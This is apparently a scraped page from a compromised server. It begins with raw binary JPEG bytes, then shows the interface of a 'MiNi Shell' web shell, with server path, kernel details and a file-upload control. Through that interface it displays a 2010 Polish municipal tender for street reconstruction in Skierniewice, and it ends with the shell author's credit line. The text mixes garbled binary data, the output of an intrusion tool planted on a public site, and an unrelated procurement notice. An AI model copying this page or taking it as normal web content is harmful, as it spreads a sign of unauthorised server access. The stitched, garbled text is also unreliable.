JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/215438-N-2010.html

<p class="kh_header"><b>Skierniewice: Przebudowa ul. Próchnika oraz ulic Willowej, Wieniawskiego i ul. Kosynierów</b><br>
<b>Numer ogłoszenia: 215438 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Próchnika oraz ulic Willowej, Wieniawskiego i ul. Kosynierów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: wykonanie przebudowy ul. Próchnika, Willowej, Wieniawskiego i ul. Kosynierów wraz budową kanalizacji deszczowej, przebudową sieci elektroenergetycznej oraz przebudową sieci telekomunikacyjnej zgodnie z przedmiarem robót oraz specyfikacją techniczną stanowiącymi załączniki do niniejszej SIWZ. 
2.Zamówienie obejmuje:
a)przebudowę ul. Próchnika,
b)przebudowę ul. Willowej i Wieniawskiego,
c)przebudowę ul. Kosynierów.
3.Charakterystyka i zakres przebudowy:
a)Charakterystyka
I: ul. Próchnika:
- długość odcinka stanowiącego przedmiot zamówienia wynosi 262,75 m,
- ulica posiada nawierzchnię gruntową.
II ul. Willowa i Wieniawskiego:
- długość odcinka stanowiącego przedmiot zamówienia wynosi 185 m (ul. Willowa) i 535 m (ul. Wieniawskiego wraz z sięgaczami),
- ulice maja nawierzchnię z płyt betonowych (ul. Willowa), gruntową oraz asfaltową (ul. Wieniawskiego),
III ul. Kosynierów:
- długość odcinka stanowiącego przedmiot zamówienia wynosi 306 m,
- nawierzchnia ulicy jest gruntowa,
b)Zakres robót:
I ul. Próchnika:
- rozebranie istniejącej nawierzchni drogowej,
- wykonanie jezdni (szer. 5,00 m) o nawierzchni asfaltobetonowej grubości 8 cm (4 cm warstwy ścieralnej i 4 cm warstwy wiążącej) na podbudowie z kruszywa łamanego grubości 30 cm na odcinku od 0+000 do 0+030,00 i 23 cm na odcinku 0+030,00 do 0+262,75 oraz kategorii ruchu KR1,
- wykonanie jednostronnego chodnika z kostki betonowej Behaton gr. 6 cm na podsypce cementowo - piaskowej grubości 15 cm, 
- wykonanie zjazdów do posesji z kostki betonowej typu Behaton gr. 8 cm na podbudowie z kruszywa łamanego grubości 20 cm,
- wykonanie kanalizacji deszczowej z separatorem i wpustami.
II ul. Willowa i Wieniawskiego:ul. Willowa:
- rozebranie istniejącej nawierzchni drogowej,
- wykonanie nawierzchni asfaltobetonowej gr. 8 cm (4 cm warstwy ścieralnej i 4 cm warstwy wiążącej) na warstwie podbudowy z kruszywa łamanego grubości 23 cm,
- wykonanie zjazdów i zatok postojowych z kostki betonowej typu Behaton gr. 8cm z podsypką cementowo - piaskową gr. 3 cm oraz na podbudowie z chudego betonu gr. 12 cm,
- wykonanie chodników z kostki betonowej typu Behaton gr. 6 cm na podsypce cementowo - piaskowej gr. 5 cm, 
- przebudowa napowietrznych linii niskiego napięcia,
- przebudowa istniejącego oświetlenia ulicznego,
- przebudowa indywidualnych przyłączy energetycznych,
- przebudowa sieci telekomunikacyjnej doziemnej i naziemnej,
ul. Wieniawskiego:
- rozebranie istniejącej nawierzchni drogowej,
- wykonanie nawierzchni asfaltobetonowej gr. 8 cm (4 cm warstwy ścieralnej i 4 cm warstwy wiążącej) na warstwie podbudowy z kruszywa łamanego grubości 20 cm,
- wykonanie zjazdów z kostki betonowej typu Behaton gr. 8cm z podsypką cementowo - piaskową gr. 3 cm oraz na podbudowie z chudego betonu gr. 12 cm,
- wykonanie chodników z kostki betonowej typu Behaton gr. 6 cm na podsypce cementowo - piaskowej gr. 5 cm, 
- wykonanie nawierzchni chodników dla zatrzymujących się pojazdów z kostki betonowej typu Behaton gr. 8 cm  z podsypką cementowo - piaskową gr. 3 cm oraz na podbudowie z chudego betonu gr. 12 cm,
- wykonanie kanalizacji deszczowej z wpustami,
- przebudowa napowietrznych linii niskiego napięcia,
- przebudowa istniejącego oświetlenia ulicznego,
- przebudowa indywidualnych przyłączy energetycznych,
- przebudowa sieci telekomunikacyjnej doziemnej i naziemnej.
III ul. Kosynierów:
- wykonanie podbudowy z kruszywa łamanego o grubości 20 cm,
- wykonanie nawierzchni jezdni z betonu asfaltowego o grubości 4 cm (warstwa wiążąca) i 4 cm (warstwa ścieralna) oraz szerokości 5 m,
- wykonanie ciągu pieszo jezdnego z kostki betonowej Behaton o grubości 8 cm na podsypce cementowo - piaskowej o grubości 3 cm i podbudowie o grubości 20 cm,
- wykonanie poboczy o szerokości 0,75 cm,
- zabezpieczenie istniejących sieci infrastruktury technicznej rurami arota.
4.Szczegółowy opis zamówienia został zawarty w dokumentacjach projektowych na wykonanie zadania oraz w Specyfikacji Technicznej, które są dostępne w Wydziale Realizacji Inwestycji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12.
5.Podział zamówienia na części
a)Zamówienie dzieli się na następujące części stanowiące odrębne zadania inwestycyjne:
- Cześć I - Przebudowa ul. Próchnika,
- Część II - Przebudowa ul. Willowej i Wieniawskiego,
- Cześć III - Przebudowa ul. Kosynierów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających zgodnie z art. 67, ust. 1, pkt 6 Ustawy. Zamówienia uzupełniające stanowić mogą więcej niż 50% wartości zamówienia podstawowego i polegać będą na powtórzeniu zamówienia takiego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.11.12.00-0, 45.23.00.00-8, 45.23.11.10-9, 45.23.13.00-8, 45.23.14.00-9, 45.23.22.00-4, 45.23.30.00-9, 45.23.31.00-0, 45.23.31.20-6, 45.23.31.24-4, 45.23.33.00-2, 45.23.32.23-8, 45.31.61.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości:
a)Część I - 10.000 zł (dziesięć tysięcy złotych),
b)Część II - 25.000 zł (dwadzieścia pięć tysięcy złotych),
c)Część III - 6 000 zł (sześć tysięcy złotych).
2. Wadium powinno być wniesione przed upływem terminu składania ofert.
3.Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6. Ustawy.
Wadium w formie pieniężnej należy wpłacić na rachunek bankowy o nr konta: 
KREDYT BANK S.A. oddział w Skierniewicach nr 42 1500 1689 1216 8004 0851 0000 z dopiskiem RI - wadium do przetargu pn. Przebudowa ul. Próchnika oraz ulic Willowej, Wieniawskiego i ul. Kosynierów. Za termin wniesienia wadium w formie pieniężnej uznaje się termin wpływu na rachunek Zamawiającego.
4. Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym i jego zwrot nastąpi zgodnie z art. 46, ust. 4 ustawy.
5.  Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta Skierniewice.
6. Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 Ustawy.
7. Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46, ust. 4a i 5 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek zostanie spełniony przez Wykonawcę który dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia a w przypadku ich braku, przedstawi zobowiązanie podmiotów posiadających takowe do ich udostępnienia bądź też przedstawi listę podwykonawców, z których zamierza korzystać w celu zrealizowania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek zostanie spełniony przez Wykonawcę który posiada opłaconą polisę ubezpieczenia od odpowiedzialności cywilnej z tytułu wykonywanej działalności na kwotę minimum 500.000 zł (pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wszyscy oferenci ubiegający się o niniejsze zamówienie muszą spełnić warunki wymienione w punkcie 5 i dołączyć do oferty wskazane poniżej oświadczenia i dokumenty:
1. Ofertę wykonawcy - wg wzoru stanowiącego załącznik nr 2 do SIWZ.
2. Wykaz Cen -  sporządzony wg załączników nr 2.1 - 2.3 do SIWZ:
a)Wykonawcy winni oddzielnie wycenić każdą pozycję w Wykazie Cen (CW) (załączniki nr 2.1 - 2.3 do SIWZ), przestrzegając zasad dotyczących wyliczenia wartości w każdej pozycji oraz podsumowania kwot ogólnych podanych w CW,
b)CW należy odczytywać łącznie z innymi dokumentami kontraktowymi. Przyjmuje się, iż Wykonawca dokładnie zapoznał się ze szczegółowym opisem robót, jakie mają zostać wykonane
i sposobem ich wykonania. Całość Robót winna być wykonana zgodnie z zamierzeniem
i przeznaczeniem przedmiotu zamówienia,
c)ilości podane w każdej pozycji Wykazu są wielkościami informacyjnymi, wskazującymi jedynie orientacyjny zakres prac, które powinny być wykonane dla skompletowania danego elementu (Roboty), za którą przysługuje wyliczone dalej wynagrodzenie ryczałtowe i nie mają znaczenia przy rozliczaniu wartości danego elementu (Roboty) po jego wykonaniu,
d)niezależnie od wymienionego poprzednio przeznaczenia, ilości w Wykazie zostały podane dla stworzenia wspólnych i porównywalnych wycen na potrzeby przetargu,
e)krótkie opisy pozycji przedstawione w CW są podane tylko dla celów identyfikacyjnych
i w żaden sposób nie modyfikują czy anulują szczegółowych opisów zawartych w specyfikacjach technicznych i projektach,
3. Potwierdzenie wniesienia wadium - wymagania dotyczące wadium zawarte zostały w pkt. 11 Specyfikacji Istotnych Warunków Zamówienia. 
4. Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22, ust. 1 na - wg wzoru stanowiącego załącznik nr 3 do SIWZ 
a)Oferent korzystający z własnego potencjału technicznego i osobowego wykreśla punkt 3 i 4 z załącznika nr 3 natomiast w załącznikach nr 5 i 6 wpisuje: NIE DOTYCZY
b)Oferent nie posiadający potencjału technicznego i osobowego ale korzystający z potencjału udostępnionego przez podmioty trzecie wykreśla w załączniku nr 3 punkty 2 i 4 jednocześnie wypełniając załącznik nr 5,
c)Oferent korzystający z podwykonawców w załączniku nr 3 wykreśla punkty 2 i 3 a zarazem wypełnia załącznik nr 6.
5. Informację dotyczącą podwykonawców i zakresu robót, im powierzonego - wg załącznika nr 5. Jeśli wykonawca nie będzie korzystał z podwykonawców wówczas w załączniku nr 5 wpisuje Nie Dotyczy.
6.Oświadczenie w sprawie akceptacji warunków umowy na wykonanie zadania w tym: udzielenie gwarancji (na okres minimum 48 miesięcy od daty odbioru końcowego) i zobowiązanie do realizacji zadania w terminie określonym w pkt. 5 SIWZ - wg wzoru stanowiącego załącznik nr 7. Treść warunków umowy została zawarta w załączniku 8 do Specyfikacji.
7.Pełnomocnictwo, o którym mowa w pkt. 13.2 SIWZ,
8. W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - dokument potwierdzający posiadanie aktualnej i opłaconej polisy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 500.000 zł (pięćset tysięcy złotych),.
9. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do oferty należy dołączyć dokumenty:  
a) pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o którym mowa w art. 23 ustawy,
b) dokumenty wymienione w punktach od 15.4 do 15.8 muszą być złożone przez każdy podmiot,
c)pozostałe dokumenty wymienione w pkt. 15 podmioty składają wspólnie jako konsorcjum,
d) w przypadku ofert składanych wspólnie warunki zawarte w pkt. 6 muszą być spełnione wspólnie lub przynajmniej przez jeden podmiot, o ile zamawiający nie zastrzegł inaczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie: przedłużenia terminu realizacji, zmiany wynagrodzenia, terminów płatności. Zamawiający może wyrazić zgodę na zmianę postanowień umowy pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (warunki pogodowe, odmienne od przyjętych w dokumentacji warunki terenowe, zwłoka lub odmowa w wydawaniu pozwoleń i uzgodnień przez odpowiednie urzędy, konieczność usunięcia błędów w dokumentacji projektowej). Zmiana postanowień umowy może być dokonana tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Realizacji Inwestycji, ul. Floriana 9, pok. 12, 96-100 Skierniewice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2010 godzina 11:30, miejsce: Sekretariat Urzedu Miasta Skierniewice, ul. Rynek 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com